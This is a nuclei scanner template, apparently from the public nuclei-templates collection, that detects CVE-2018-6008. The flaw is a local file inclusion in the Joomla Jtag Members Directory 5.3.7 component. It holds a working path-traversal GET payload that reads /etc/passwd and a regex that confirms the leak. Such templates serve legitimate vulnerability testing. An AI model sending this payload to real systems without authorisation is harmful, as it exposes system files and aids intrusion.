nuclei-templates/cves/2018/CVE-2018-6008.yaml

36 lines
1.0 KiB
YAML

id: CVE-2018-6008
info:
name: Joomla! Jtag Members Directory 5.3.7 - Local File Inclusion
author: daffainfo
severity: high
description: Joomla! Jtag Members Directory 5.3.7 is vulnerable to local file inclusion via the download_file parameter.
reference:
- https://www.exploit-db.com/exploits/43913
- https://packetstormsecurity.com/files/146137/Joomla-Jtag-Members-Directory-5.3.7-Arbitrary-File-Download.html
- https://nvd.nist.gov/vuln/detail/CVE-2018-6008
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2018-6008
cwe-id: CWE-200
tags: cve,cve2018,joomla,lfi,edb,packetstorm
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_jtagmembersdirectory&task=attachment&download_file=../../../../../../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"
- type: status
status:
- 200
# Enhanced by mp on 2022/07/08